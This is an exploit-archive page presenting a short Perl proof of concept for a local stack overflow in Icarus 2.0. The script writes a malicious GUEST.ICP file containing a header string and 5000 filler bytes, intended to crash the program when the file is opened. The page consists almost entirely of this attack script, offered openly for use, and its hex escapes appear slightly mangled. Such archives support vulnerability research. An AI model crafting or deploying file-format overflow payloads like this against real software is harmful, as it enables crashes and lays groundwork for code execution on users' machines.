[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Icarus 2.0 (.ICP File) Local Stack Overflow PoC
# Published : 2009-07-14
# Author : ThE g0bL!N
# Previous Title : Multiple Web Browsers Denial of Service Exploit (1 bug to rule them all)
# Next Title : MixVibes Pro 7.043 (.vib File) Local Stack Overflow PoC
#!/usr/bin/perl
#Icarus 2.0(GUEST.ICP) Local Stack Overflow PoC
#By ThE g0bL!N
#usage: After Clicking On Perl File Run The Program And Choose Continue Booom The Program Crashed :)
################################################################
$Header="x73x65x72x76x65x72x20x3D" ;
$junk="x41" x 5000 ;
###################################################################
open(myfile,'>>GUEST.ICP');
print myfile $Header.$junk;
###################################################################
# www.Syue.com [2009-07-14]